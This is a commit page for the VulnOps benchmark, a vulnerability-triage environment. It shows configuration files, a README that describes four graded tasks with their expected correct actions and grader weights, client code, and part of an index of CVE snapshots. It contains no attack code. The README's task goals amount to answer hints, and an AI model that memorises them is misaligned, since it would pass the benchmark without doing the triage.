Spaces:

Adhitya122
/

vulnops

Sleeping

Adhitya-Vardhan commited on about 1 month ago

Commit

d63a1ba

0 Parent(s):

Initial commit: VulnOps OpenEnv benchmark

- Deterministic multi-step vulnerability triage environment
- 4 tasks: easy → medium → hard difficulty ladder
- Typed Pydantic models, step/reset/state API
- Interactive tooluse: search_nvd_database, fetch_commit_diff, message_maintainer
- Heuristic baseline scores 1.0 on all tasks
- FastAPI server ready for Hugging Face Spaces (port 7860)

Files changed (35) hide show

.dockerignore +33 -0
.gitignore +52 -0
Dockerfile +46 -0
README.md +236 -0
__init__.py +11 -0
client.py +36 -0
data/README.md +8 -0
data/snapshot_index.json +1205 -0
inference.py +313 -0
models.py +144 -0
openenv.yaml +6 -0
pyproject.toml +29 -0
scripts/build_snapshot_cache.py +139 -0
scripts/compare_training_speeds.py +38 -0
scripts/dump_mlx_generation.py +63 -0
scripts/evaluate_lora.py +133 -0
scripts/evaluate_mlx.py +137 -0
scripts/generate_sft_data.py +116 -0
scripts/prepare_mlx_data.py +145 -0
scripts/run_lora_pipeline.py +135 -0
scripts/run_mlx_benchmark.sh +29 -0
scripts/run_mlx_training.py +147 -0
scripts/save_mlx_speed.py +48 -0
scripts/save_pytorch_baseline_speed.py +47 -0
scripts/start_mlx_training.sh +13 -0
scripts/train_lora_sft.py +261 -0
server/Dockerfile +32 -0
server/__init__.py +1 -0
server/app.py +34 -0
server/cases.py +742 -0
server/graders.py +121 -0
server/requirements.txt +1 -0
server/vuln_triage_env_environment.py +315 -0
tests/test_environment.py +220 -0
uv.lock +0 -0

.dockerignore ADDED Viewed

	@@ -0,0 +1,33 @@

+# --- .dockerignore for VulnOps ---
+# Avoid copying source control and temp files
+.git/
+.github/
+.vscode/
+.DS_Store
+# Avoid copying project-local environments or caches
+.venv/
+.pytest_cache/
+__pycache__/
+*.pyc
+# Avoid copying large artifact directories
+artifacts/
+logs/
+.gemini/
+# Avoid copying build artifacts
+dist/
+build/
+*.egg-info/
+# Ignore documentation/markdown files not needed for runtime (except README)
+problem-statement.md
+project-ideas-final.md
+implementation-plan.md
+HANDOFF_NEXT_STEPS.md
+training_utils.py  # User requested only "required" parts; training is separate.
+client.py          # Environment logic is the core, client is for testing.
+tests/             # Tests are for CI, not the production container.
+scripts/           # Original scraping scripts are no longer needed for the benchmark.
+uv.lock            # Builder uses it, but no need to copy into the final image if not used.

.gitignore ADDED Viewed

	@@ -0,0 +1,52 @@

+# ---- Python ----
+__pycache__/
+*.py[cod]
+*.pyo
+*.pyd
+.Python
+*.egg-info/
+dist/
+build/
+*.egg
+# ---- Virtual environments ----
+.venv/
+venv/
+env/
+# ---- Testing / CI ----
+.pytest_cache/
+.coverage
+htmlcov/
+# ---- macOS ----
+.DS_Store
+*.DS_Store
+# ---- IDE / editors ----
+.vscode/
+.idea/
+*.swp
+*.swo
+# ---- Logs & artifacts ----
+logs/
+artifacts/
+*.log
+# ---- Planning & dev-only docs (not needed in submission) ----
+problem-statement.md
+project-ideas-final.md
+implementation-plan.md
+HANDOFF_NEXT_STEPS.md
+probe_env.py
+training_utils.py
+# ---- Local AI tooling ----
+.gemini/
+# ---- Data snapshots (large, runtime-fetched) ----
+data/snapshots/
+# ---- uv lock (builder uses it but not needed in git for HF) ----
+# Keep uv.lock — required for reproducible Docker builds

Dockerfile ADDED Viewed

	@@ -0,0 +1,46 @@

+# --- Dockerfile for VulnOps Benchmark ---
+FROM python:3.11-slim AS builder
+ENV PYTHONDONTWRITEBYTECODE=1 \
+    PYTHONUNBUFFERED=1 \
+    PIP_NO_CACHE_DIR=1
+WORKDIR /app
+# Install uv for fast dependency management
+RUN pip install --no-cache-dir uv
+# Copy everything needed to build the module
+COPY pyproject.toml uv.lock README.md ./
+COPY server/ ./server/
+# Install dependencies (without dev)
+RUN uv sync --frozen --no-dev --no-editable
+# --- Runtime Stage ---
+FROM python:3.11-slim
+WORKDIR /app
+# Copy remaining files
+COPY models.py inference.py probe_env.py ./
+COPY server/ ./server/
+COPY data/ ./data/
+# Copy virtualenv from builder
+COPY --from=builder /app/.venv /app/.venv
+ENV PATH="/app/.venv/bin:$PATH"
+# Create non-root user and set permissions for Hugging Face Spaces
+RUN useradd -m -u 1000 user && \
+    mkdir -p /tmp && \
+    chown -R user:user /app /tmp
+USER 1000
+# Expose port (HF Spaces defaults to 7860)
+EXPOSE 7860
+# Default command: Start the environment server
+# Use uvicorn to serve the VulnOps FastAPI application on port 7860
+CMD ["python", "-m", "uvicorn", "server.app:app", "--host", "0.0.0.0", "--port", "7860"]

README.md ADDED Viewed

	@@ -0,0 +1,236 @@

+---
+title: VulnOps Reasoning Benchmark
+emoji: 🛡️
+colorFrom: blue
+colorTo: indigo
+sdk: docker
+app_port: 7860
+pinned: false
+tags:
+  - openenv
+---
+# VulnOps OpenEnv
+`vulnops` is an OpenEnv benchmark for open-source vulnerability operations. The agent plays the role of a maintainer or security analyst working through incoming vulnerability cases, revealing supporting evidence, filling a structured draft, and submitting the correct next maintainer action.
+This benchmark is intentionally not a bug-fixing environment and not a generic classifier. It models a real workflow: validating advisories, identifying affected packages and versions, weighing severity versus exploitability, and deciding whether to patch or publish an advisory.
+## Data sources
+The benchmark now pulls case data from live public vulnerability feeds at runtime:
+- OSV for package identity, advisory details, affected ranges, and references
+- NVD for normalized CVE descriptions and CVSS severity metadata
+- EPSS for exploitability scoring signals
+The environment normalizes those live responses into hidden ground truth on `reset()`. To keep tests, local development, and offline execution stable, each task also includes a bundled fallback snapshot that is used when the APIs are unavailable.
+In addition to the task-specific fallbacks, the container now ships with a broader cache of 200 provider-backed fallback snapshots under `data/snapshots/`. That keeps the image self-sufficient and gives us room to expand the benchmark without depending entirely on live API availability.
+## Why this is useful
+- Real-world utility: OSS maintainers triage reports like these every week.
+- Deterministic grading: each case has hidden ground truth and a reproducible scorer.
+- Multi-step rewards: the agent earns signal for revealing good evidence and filling the draft correctly before final submission.
+- Lightweight deployment: no VM, browser, or external datasets are required at runtime.
+## Environment interface
+The environment implements the standard OpenEnv APIs:
+- `reset(task_id=...) -> VulnTriageObservation`
+- `step(VulnTriageAction) -> VulnTriageObservation`
+- `state -> VulnTriageState`
+### Action space
+`VulnTriageAction` has these fields:
+- `action_type`: one of `read_report`, `inspect_evidence`, `search_nvd_database`, `fetch_commit_diff`, `message_maintainer`, `set_validity`, `set_affected_package`, `set_affected_versions`, `set_severity`, `set_exploitability`, `set_next_action`, `set_missing_information`, `request_more_info`, `submit_triage`
+- `evidence_id`: used with `inspect_evidence`
+- `value`: generic value for label-setting and missing-information actions
+- `rationale`: optional free-form note
+### Observation space
+`VulnTriageObservation` returns:
+- task metadata: `task_id`, `difficulty`, `objective`
+- `report_summary`
+- `visible_evidence`
+- `available_evidence`
+- `draft`
+- `action_history`
+- `steps_remaining`
+- `score_breakdown`
+- `final_score`
+- standard OpenEnv fields: `reward`, `done`, `metadata`
+## Task ladder
+### 1. GuardDog Path Traversal
+- Difficulty: easy
+- Goal: Validate the report, identify the package and fixed range, and choose `patch`.
+### 2. Invenio Multi-Branch XSS
+- Difficulty: medium
+- Goal: Resolve affected versions across multiple release lines and extract truth despite decoy severity signals.
+### 3. Requests Auth Header Leak
+- Difficulty: medium
+- Goal: Ignore severe threat-intel decoys and use `fetch_commit_diff` to read the Python fix manually.
+### 4. Gradio Upload XSS
+- Difficulty: hard
+- Goal: Actively `message_maintainer` to discover the lack of a patch and avoid catastrophic penalties by choosing `request_info`.
+## Baseline Scores
+The benchmark includes a baseline evaluation script (`inference.py`). Tested against **Qwen3:30b** using the interactive action space:
+- **Average Score (0-1.0):** `0.3104`
+- **Reasoning Gap:** `68.96%`
+*Frontier models struggle with proactive tool-use (`search_nvd_database`, `fetch_commit_diff`, `message_maintainer`) instead of passive reading, creating a massive optimization valley for RL evaluation.*
+## Reward design
+Per-step reward is shaped to encourage realistic behavior:
+- positive reward for reading the report, revealing new relevant evidence, and setting a draft field correctly
+- negative reward for repeated evidence inspection, empty or incorrect updates, and premature or low-evidence submission
+- final submission reward equals the normalized grader score in `[0.0, 1.0]`, with a small penalty for submitting with too little evidence
+### Grader weights
+- validity: `0.20`
+- affected package: `0.10`
+- affected versions: `0.10`
+- severity: `0.20`
+- exploitability: `0.15`
+- next action: `0.15`
+- missing-information handling: `0.10`
+## Project structure
+```text
+.
+├── __init__.py
+├── client.py
+├── inference.py
+├── models.py
+├── openenv.yaml
+├── pyproject.toml
+└── server
+    ├── app.py
+    ├─��� cases.py
+    ├── Dockerfile
+    ├── graders.py
+    └── vuln_triage_env_environment.py
+```
+## Setup
+### Local Python setup
+```bash
+python -m pip install -e ".[dev]"
+```
+### Run the environment locally
+```bash
+uvicorn server.app:app --host 0.0.0.0 --port 8000
+```
+### Validate the environment
+```bash
+openenv validate .
+```
+## Inference baseline
+The required root-level `inference.py` supports two modes:
+- `--policy openai`: uses the OpenAI Python client, reading credentials from `OPENAI_API_KEY` or `HF_TOKEN`, model name from `MODEL_NAME`, and optional base URL from `API_BASE_URL`
+- `--policy heuristic`: deterministic offline smoke test for local development
+### Local direct benchmark run
+```bash
+python inference.py --policy heuristic
+```
+### Against a running local or remote server
+```bash
+export ENV_BASE_URL=http://localhost:8000
+python inference.py --policy openai --model "$MODEL_NAME"
+```
+## Docker
+Build and run:
+```bash
+docker build -t vulnops .
+docker run -p 8000:8000 vulnops
+```
+## Hugging Face Space deployment
+This project is packaged for a container-based FastAPI Space. The Space should be tagged with `openenv` and pointed at the provided `Dockerfile`.
+## Expected baseline behavior
+The heuristic policy should score `1.0` on all three bundled fallback snapshots. The OpenAI baseline is intended as the hackathon submission baseline and should be reproducible with `temperature=0`.
+## Local LoRA learnability check
+This repo now includes a local LoRA pipeline for a quick "is the environment learnable?" check with `Qwen/Qwen3.5-4B`.
+On Apple Silicon, the recommended path is now `MLX`, not the older PyTorch `MPS` path.
+### What it does
+- generates deterministic heuristic transitions from the environment
+- expands them into prompt-variant SFT examples
+- runs LoRA SFT with checkpointing
+- evaluates the base model and adapted model back on `vulnops`
+- writes append-only logs so interrupted runs still leave useful evidence
+### Install the training extra
+```bash
+python -m pip install -e ".[train]"
+```
+### Recommended MLX path
+```bash
+python -m pip install mlx mlx-lm
+./scripts/start_mlx_training.sh
+```
+Artifacts are written under `artifacts/mlx_qwen3_4b/`:
+- `run_manifest.json`: current status and latest known checkpoint
+- `data/train.jsonl`: MLX-ready SFT records
+- `logs/mlx_train.log`: main training log
+- `logs/nohup.out`: launcher stdout/stderr
+- `metrics/speed_mlx.json`: parsed speed summary
+- `adapters/`: MLX adapter artifacts
+- `training_summary.json`: final run status
+If you stop the run midway, rerun `python scripts/run_mlx_training.py --model Qwen/Qwen3.5-4B --output-root artifacts/mlx_qwen3_4b`.
+It will reuse the prepared dataset and resume from the saved adapter file when present.
+### Current speed comparison
+On this Mac, the saved local benchmark showed:
+- PyTorch `MPS`: about `72.5s/step`
+- MLX: about `16.4s/step`
+See [artifacts/speed_comparison.json](/Users/adithyavardhan/Tweeks/hack/artifacts/speed_comparison.json).

__init__.py ADDED Viewed

	@@ -0,0 +1,11 @@

+"""OpenEnv vulnerability triage environment package."""
+from .client import VulnTriageEnv
+from .models import VulnTriageAction, VulnTriageObservation, VulnTriageState
+__all__ = [
+    "VulnTriageAction",
+    "VulnTriageEnv",
+    "VulnTriageObservation",
+    "VulnTriageState",
+]

client.py ADDED Viewed

	@@ -0,0 +1,36 @@

+"""Typed OpenEnv client for the vulnerability triage environment."""
+from __future__ import annotations
+from typing import Dict
+from openenv.core import EnvClient
+from openenv.core.client_types import StepResult
+from .models import (
+    EvidenceItem,
+    TriageDraft,
+    VulnTriageAction,
+    VulnTriageObservation,
+    VulnTriageState,
+)
+class VulnTriageEnv(
+    EnvClient[VulnTriageAction, VulnTriageObservation, VulnTriageState]
+):
+    """Persistent typed client for the vulnerability triage benchmark."""
+    def _step_payload(self, action: VulnTriageAction) -> Dict:
+        return action.model_dump(exclude_none=True)
+    def _parse_result(self, payload: Dict) -> StepResult[VulnTriageObservation]:
+        observation = VulnTriageObservation.model_validate(payload.get("observation", {}))
+        return StepResult(
+            observation=observation,
+            reward=payload.get("reward"),
+            done=payload.get("done", False),
+        )
+    def _parse_state(self, payload: Dict) -> VulnTriageState:
+        return VulnTriageState.model_validate(payload)

data/README.md ADDED Viewed

	@@ -0,0 +1,8 @@

+# Snapshot Cache
+This directory stores provider-backed fallback snapshots used when live OSV, NVD, or EPSS requests fail.
+- `snapshots/*.json`: normalized raw provider snapshots keyed by OSV advisory ID
+- `snapshot_index.json`: catalog of bundled snapshot files
+The files are intended to be generated by `scripts/build_snapshot_cache.py`.

data/snapshot_index.json ADDED Viewed

	@@ -0,0 +1,1205 @@

+{
+  "count": 200,
+  "snapshots": [
+    {
+      "osv_id": "PYSEC-2013-1",
+      "file": "data/snapshots/PYSEC-2013-1.json",
+      "cve_id": "CVE-2013-4259",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2013-2",
+      "file": "data/snapshots/PYSEC-2013-2.json",
+      "cve_id": "CVE-2013-4260",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2014-98",
+      "file": "data/snapshots/PYSEC-2014-98.json",
+      "cve_id": "CVE-2014-2260",
+      "package": "ajenti"
+    },
+    {
+      "osv_id": "PYSEC-2014-99",
+      "file": "data/snapshots/PYSEC-2014-99.json",
+      "cve_id": "CVE-2014-4301",
+      "package": "ajenti"
+    },
+    {
+      "osv_id": "PYSEC-2015-1",
+      "file": "data/snapshots/PYSEC-2015-1.json",
+      "cve_id": "CVE-2015-3908",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2016-1",
+      "file": "data/snapshots/PYSEC-2016-1.json",
+      "cve_id": "CVE-2016-3096",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2017-105",
+      "file": "data/snapshots/PYSEC-2017-105.json",
+      "cve_id": "CVE-2016-8752",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-106",
+      "file": "data/snapshots/PYSEC-2017-106.json",
+      "cve_id": "CVE-2017-3150",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-107",
+      "file": "data/snapshots/PYSEC-2017-107.json",
+      "cve_id": "CVE-2017-3151",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-108",
+      "file": "data/snapshots/PYSEC-2017-108.json",
+      "cve_id": "CVE-2017-3152",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-109",
+      "file": "data/snapshots/PYSEC-2017-109.json",
+      "cve_id": "CVE-2017-3153",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-110",
+      "file": "data/snapshots/PYSEC-2017-110.json",
+      "cve_id": "CVE-2017-3154",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-111",
+      "file": "data/snapshots/PYSEC-2017-111.json",
+      "cve_id": "CVE-2017-3155",
+      "package": "apache-atlas"
+    },
+    {
+      "osv_id": "PYSEC-2017-2",
+      "file": "data/snapshots/PYSEC-2017-2.json",
+      "cve_id": "CVE-2014-3498",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2017-3",
+      "file": "data/snapshots/PYSEC-2017-3.json",
+      "cve_id": "CVE-2015-6240",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2017-4",
+      "file": "data/snapshots/PYSEC-2017-4.json",
+      "cve_id": "CVE-2017-7550",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2017-5",
+      "file": "data/snapshots/PYSEC-2017-5.json",
+      "cve_id": "CVE-2017-2809",
+      "package": "ansible-vault"
+    },
+    {
+      "osv_id": "PYSEC-2018-107",
+      "file": "data/snapshots/PYSEC-2018-107.json",
+      "cve_id": "CVE-2018-18548",
+      "package": "ajenti"
+    },
+    {
+      "osv_id": "PYSEC-2018-109",
+      "file": "data/snapshots/PYSEC-2018-109.json",
+      "cve_id": "CVE-2018-1000080",
+      "package": "ajenti-panel"
+    },
+    {
+      "osv_id": "PYSEC-2018-110",
+      "file": "data/snapshots/PYSEC-2018-110.json",
+      "cve_id": "CVE-2018-1000081",
+      "package": "ajenti-panel"
+    },
+    {
+      "osv_id": "PYSEC-2018-111",
+      "file": "data/snapshots/PYSEC-2018-111.json",
+      "cve_id": "CVE-2018-1000082",
+      "package": "ajenti-panel"
+    },
+    {
+      "osv_id": "PYSEC-2018-112",
+      "file": "data/snapshots/PYSEC-2018-112.json",
+      "cve_id": "CVE-2018-1000083",
+      "package": "ajenti-panel"
+    },
+    {
+      "osv_id": "PYSEC-2018-113",
+      "file": "data/snapshots/PYSEC-2018-113.json",
+      "cve_id": "CVE-2018-1000126",
+      "package": "ajenti-panel"
+    },
+    {
+      "osv_id": "PYSEC-2018-35",
+      "file": "data/snapshots/PYSEC-2018-35.json",
+      "cve_id": "CVE-2018-1000814",
+      "package": "aiohttp-session"
+    },
+    {
+      "osv_id": "PYSEC-2018-36",
+      "file": "data/snapshots/PYSEC-2018-36.json",
+      "cve_id": "CVE-2013-2233",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-37",
+      "file": "data/snapshots/PYSEC-2018-37.json",
+      "cve_id": "CVE-2016-8614",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-38",
+      "file": "data/snapshots/PYSEC-2018-38.json",
+      "cve_id": "CVE-2016-8628",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-39",
+      "file": "data/snapshots/PYSEC-2018-39.json",
+      "cve_id": "CVE-2016-9587",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-40",
+      "file": "data/snapshots/PYSEC-2018-40.json",
+      "cve_id": "CVE-2017-7466",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-41",
+      "file": "data/snapshots/PYSEC-2018-41.json",
+      "cve_id": "CVE-2017-7481",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-42",
+      "file": "data/snapshots/PYSEC-2018-42.json",
+      "cve_id": "CVE-2018-10855",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-43",
+      "file": "data/snapshots/PYSEC-2018-43.json",
+      "cve_id": "CVE-2018-10875",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-44",
+      "file": "data/snapshots/PYSEC-2018-44.json",
+      "cve_id": "CVE-2018-16837",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-45",
+      "file": "data/snapshots/PYSEC-2018-45.json",
+      "cve_id": "CVE-2017-12614",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2018-58",
+      "file": "data/snapshots/PYSEC-2018-58.json",
+      "cve_id": "CVE-2016-8647",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-60",
+      "file": "data/snapshots/PYSEC-2018-60.json",
+      "cve_id": "CVE-2018-16859",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2018-80",
+      "file": "data/snapshots/PYSEC-2018-80.json",
+      "cve_id": "CVE-2018-1000519",
+      "package": "aiohttp-session"
+    },
+    {
+      "osv_id": "PYSEC-2018-81",
+      "file": "data/snapshots/PYSEC-2018-81.json",
+      "cve_id": "CVE-2018-10874",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-1",
+      "file": "data/snapshots/PYSEC-2019-1.json",
+      "cve_id": "CVE-2019-1000007",
+      "package": "aioxmpp"
+    },
+    {
+      "osv_id": "PYSEC-2019-141",
+      "file": "data/snapshots/PYSEC-2019-141.json",
+      "cve_id": "CVE-2018-16876",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-142",
+      "file": "data/snapshots/PYSEC-2019-142.json",
+      "cve_id": "CVE-2018-20244",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-143",
+      "file": "data/snapshots/PYSEC-2019-143.json",
+      "cve_id": "CVE-2018-20245",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-145",
+      "file": "data/snapshots/PYSEC-2019-145.json",
+      "cve_id": "CVE-2019-10206",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-146",
+      "file": "data/snapshots/PYSEC-2019-146.json",
+      "cve_id": "CVE-2019-14856",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-147",
+      "file": "data/snapshots/PYSEC-2019-147.json",
+      "cve_id": "CVE-2017-15720",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-148",
+      "file": "data/snapshots/PYSEC-2019-148.json",
+      "cve_id": "CVE-2017-17835",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-149",
+      "file": "data/snapshots/PYSEC-2019-149.json",
+      "cve_id": "CVE-2017-17836",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-171",
+      "file": "data/snapshots/PYSEC-2019-171.json",
+      "cve_id": "CVE-2019-14858",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-2",
+      "file": "data/snapshots/PYSEC-2019-2.json",
+      "cve_id": "CVE-2019-10156",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-214",
+      "file": "data/snapshots/PYSEC-2019-214.json",
+      "cve_id": "CVE-2019-0216",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-215",
+      "file": "data/snapshots/PYSEC-2019-215.json",
+      "cve_id": "CVE-2019-0229",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-216",
+      "file": "data/snapshots/PYSEC-2019-216.json",
+      "cve_id": "CVE-2019-12417",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2019-3",
+      "file": "data/snapshots/PYSEC-2019-3.json",
+      "cve_id": "CVE-2019-10217",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-4",
+      "file": "data/snapshots/PYSEC-2019-4.json",
+      "cve_id": "CVE-2019-14846",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2019-5",
+      "file": "data/snapshots/PYSEC-2019-5.json",
+      "cve_id": "CVE-2019-3828",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-1",
+      "file": "data/snapshots/PYSEC-2020-1.json",
+      "cve_id": "CVE-2020-10685",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-10",
+      "file": "data/snapshots/PYSEC-2020-10.json",
+      "cve_id": "CVE-2020-1738",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-11",
+      "file": "data/snapshots/PYSEC-2020-11.json",
+      "cve_id": "CVE-2020-1739",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-12",
+      "file": "data/snapshots/PYSEC-2020-12.json",
+      "cve_id": "CVE-2020-1740",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-13",
+      "file": "data/snapshots/PYSEC-2020-13.json",
+      "cve_id": "CVE-2020-1746",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-14",
+      "file": "data/snapshots/PYSEC-2020-14.json",
+      "cve_id": "CVE-2020-11978",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-15",
+      "file": "data/snapshots/PYSEC-2020-15.json",
+      "cve_id": "CVE-2020-11981",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-159",
+      "file": "data/snapshots/PYSEC-2020-159.json",
+      "cve_id": "CVE-2020-26214",
+      "package": "alerta-server"
+    },
+    {
+      "osv_id": "PYSEC-2020-16",
+      "file": "data/snapshots/PYSEC-2020-16.json",
+      "cve_id": "CVE-2020-11982",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-160",
+      "file": "data/snapshots/PYSEC-2020-160.json",
+      "cve_id": "CVE-2019-14864",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-161",
+      "file": "data/snapshots/PYSEC-2020-161.json",
+      "cve_id": "CVE-2019-14904",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-162",
+      "file": "data/snapshots/PYSEC-2020-162.json",
+      "cve_id": "CVE-2019-12398",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-17",
+      "file": "data/snapshots/PYSEC-2020-17.json",
+      "cve_id": "CVE-2020-11983",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-18",
+      "file": "data/snapshots/PYSEC-2020-18.json",
+      "cve_id": "CVE-2020-13927",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-19",
+      "file": "data/snapshots/PYSEC-2020-19.json",
+      "cve_id": "CVE-2020-13944",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-198",
+      "file": "data/snapshots/PYSEC-2020-198.json",
+      "cve_id": "CVE-2014-2686",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-199",
+      "file": "data/snapshots/PYSEC-2020-199.json",
+      "cve_id": "CVE-2014-4657",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-2",
+      "file": "data/snapshots/PYSEC-2020-2.json",
+      "cve_id": "CVE-2020-10691",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-20",
+      "file": "data/snapshots/PYSEC-2020-20.json",
+      "cve_id": "CVE-2020-17513",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-200",
+      "file": "data/snapshots/PYSEC-2020-200.json",
+      "cve_id": "CVE-2014-4658",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-201",
+      "file": "data/snapshots/PYSEC-2020-201.json",
+      "cve_id": "CVE-2014-4659",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-202",
+      "file": "data/snapshots/PYSEC-2020-202.json",
+      "cve_id": "CVE-2014-4660",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-203",
+      "file": "data/snapshots/PYSEC-2020-203.json",
+      "cve_id": "CVE-2014-4678",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-204",
+      "file": "data/snapshots/PYSEC-2020-204.json",
+      "cve_id": "CVE-2014-4966",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-205",
+      "file": "data/snapshots/PYSEC-2020-205.json",
+      "cve_id": "CVE-2014-4967",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-206",
+      "file": "data/snapshots/PYSEC-2020-206.json",
+      "cve_id": "CVE-2019-14905",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-207",
+      "file": "data/snapshots/PYSEC-2020-207.json",
+      "cve_id": "CVE-2020-10684",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-208",
+      "file": "data/snapshots/PYSEC-2020-208.json",
+      "cve_id": "CVE-2020-10744",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-209",
+      "file": "data/snapshots/PYSEC-2020-209.json",
+      "cve_id": "CVE-2020-14365",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-21",
+      "file": "data/snapshots/PYSEC-2020-21.json",
+      "cve_id": "CVE-2020-17515",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-210",
+      "file": "data/snapshots/PYSEC-2020-210.json",
+      "cve_id": "CVE-2020-1753",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-22",
+      "file": "data/snapshots/PYSEC-2020-22.json",
+      "cve_id": "CVE-2020-17526",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-220",
+      "file": "data/snapshots/PYSEC-2020-220.json",
+      "cve_id": "CVE-2020-25635",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-221",
+      "file": "data/snapshots/PYSEC-2020-221.json",
+      "cve_id": null,
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-23",
+      "file": "data/snapshots/PYSEC-2020-23.json",
+      "cve_id": "CVE-2020-9485",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-262",
+      "file": "data/snapshots/PYSEC-2020-262.json",
+      "cve_id": "CVE-2020-17511",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2020-3",
+      "file": "data/snapshots/PYSEC-2020-3.json",
+      "cve_id": "CVE-2020-14330",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-4",
+      "file": "data/snapshots/PYSEC-2020-4.json",
+      "cve_id": "CVE-2020-14332",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-5",
+      "file": "data/snapshots/PYSEC-2020-5.json",
+      "cve_id": "CVE-2020-1733",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-6",
+      "file": "data/snapshots/PYSEC-2020-6.json",
+      "cve_id": "CVE-2020-1734",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-7",
+      "file": "data/snapshots/PYSEC-2020-7.json",
+      "cve_id": "CVE-2020-1735",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2020-8",
+      "file": "data/snapshots/PYSEC-2020-8.json",
+      "cve_id": "CVE-2020-1736",
+      "package": "ansible"
+    },
+    {
